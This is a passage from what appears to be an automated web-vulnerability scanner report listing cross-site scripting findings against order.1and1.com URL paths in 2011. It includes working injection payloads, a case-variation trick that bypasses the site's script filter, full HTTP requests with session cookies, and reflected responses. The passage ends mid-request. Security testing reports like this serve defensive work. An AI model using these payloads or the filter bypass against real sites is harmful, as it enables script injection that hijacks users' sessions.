The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureGuaranteeMoneyback is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureGuaranteeMoneyback. The payload 83c9e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>eed4e62047d was submitted in the REST URL parameter 3. This input was returned as 83c9e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>eed4e62047d in a subsequent request for the URL /xml/order/FeatureGuaranteeMoneyback.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureGuaranteeMoneyback83c9e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>eed4e62047d;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureGuaranteeMoneyback;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:46:55 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=taV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykeJWx1Oy4vKyovLCksJyorJCU=; Expires=Fri, 07-Apr-2079 22:01:02 GMT; Path=/
ETag: 0de3fb6baffce8cb9b37d7e0115e4c0c
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17448


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
NO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureGuaranteeMoneyback";UNOUNO.params.lastpage="FeatureGuaranteeMoneyback83c9e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>eed4e62047d";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.8. http://order.1and1.com/xml/order/FeatureMarketingCtrCitysearch [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureMarketingCtrCitysearch

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureMarketingCtrCitysearch is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureMarketingCtrCitysearch. The payload 649d3</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>b5a1ad5a333 was submitted in the REST URL parameter 3. This input was returned as 649d3</ScRiPt ><img src=a onerror=alert(1)>b5a1ad5a333 in a subsequent request for the URL /xml/order/FeatureMarketingCtrCitysearch.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureMarketingCtrCitysearch649d3</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>b5a1ad5a333;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureMarketingCtrCitysearch;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:45:25 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=QbGExNDUrVFRUTmFXXjtzbTosNm9iXDRLPjggJCEhIB4gHhsbNTQuMTUoKikoJUo4ZFlbaSEjHk4nUWA9MDEtLDEtKy4sJi4lJC1lZiwhKFhhJzEyLi0yLywvKi0uJyg=; Expires=Fri, 07-Apr-2079 21:59:32 GMT; Path=/
ETag: e7dff180f54a2682d8bf1d6892e7732b
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 19187


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
s.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureMarketingCtrCitysearch";UNOUNO.params.lastpage="FeatureMarketingCtrCitysearch649d3</ScRiPt ><img src=a onerror=alert(1)>b5a1ad5a333";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.9. http://order.1and1.com/xml/order/FeatureMarketingCtrStat [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureMarketingCtrStat

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureMarketingCtrStat is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureMarketingCtrStat. The payload ccb50</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>3147a128d82 was submitted in the REST URL parameter 3. This input was returned as ccb50</ScRiPt ><img src=a onerror=alert(1)>3147a128d82 in a subsequent request for the URL /xml/order/FeatureMarketingCtrStat.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureMarketingCtrStatccb50</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>3147a128d82;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureMarketingCtrStat;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:45:51 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=TaV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykeJWx1Oy4vKyovLCksJyorJCU=; Expires=Fri, 07-Apr-2079 21:59:58 GMT; Path=/
ETag: 1df0b07d9edf1e6d8f16386731fd7196
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20481


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureMarketingCtrStat";UNOUNO.params.lastpage="FeatureMarketingCtrStatccb50</ScRiPt ><img src=a onerror=alert(1)>3147a128d82";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.10. http://order.1and1.com/xml/order/FeatureSite-buildingCgi [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingCgi

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingCgi is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingCgi. The payload 31b1b</ScRiPt%20>c2edeb9151d was submitted in the REST URL parameter 3. This input was returned as 31b1b</ScRiPt >c2edeb9151d in a subsequent request for the URL /xml/order/FeatureSite-buildingCgi.

This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureSite-buildingCgi31b1b</ScRiPt%20>c2edeb9151d;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureSite-buildingCgi;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:44:30 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=5al8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCofJlZ2PC8wLCswLSotKCssJSY=; Expires=Fri, 07-Apr-2079 21:58:38 GMT; Path=/
ETag: 59a5f7cd483dbd625b4e3b3399cb425e
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17070


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureSite-buildingCgi";UNOUNO.params.lastpage="FeatureSite-buildingCgi31b1b</ScRiPt >c2edeb9151d";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.11. http://order.1and1.com/xml/order/FeatureSite-buildingDsc [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingDsc

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingDsc is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingDsc. The payload 5a570</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>5c34db446ac was submitted in the REST URL parameter 3. This input was returned as 5a570</ScRiPt ><ScRiPt>alert(1)</ScRiPt>5c34db446ac in a subsequent request for the URL /xml/order/FeatureSite-buildingDsc.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureSite-buildingDsc5a570</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>5c34db446ac;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureSite-buildingDsc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:42:53 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=dYlcnQUI4YWFhW25kazFpYzAiLGVYUipBNC4tMS4uLSstKygoKyokJyseIB8eG0AuWmZodi4wK1s0Xm0zJicjIicjISQiHCQbMTpyczkuNWVuNCcoJCMoJSIlICMkHR4=; Expires=Fri, 07-Apr-2079 21:57:00 GMT; Path=/
ETag: ea2128c5205999f874b214a18414c18c
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18755


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureSite-buildingDsc";UNOUNO.params.lastpage="FeatureSite-buildingDsc5a570</ScRiPt ><ScRiPt>alert(1)</ScRiPt>5c34db446ac";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.12. http://order.1and1.com/xml/order/FeatureSite-buildingElements [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingElements

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingElements is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingElements. The payload 5314a</ScRiPt%20>fdf961380df was submitted in the REST URL parameter 3. This input was returned as 5314a</ScRiPt >fdf961380df in a subsequent request for the URL /xml/order/FeatureSite-buildingElements.

This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/FeatureSite-buildingElements5314a</ScRiPt%20>fdf961380df;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureSite-buildingElements;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
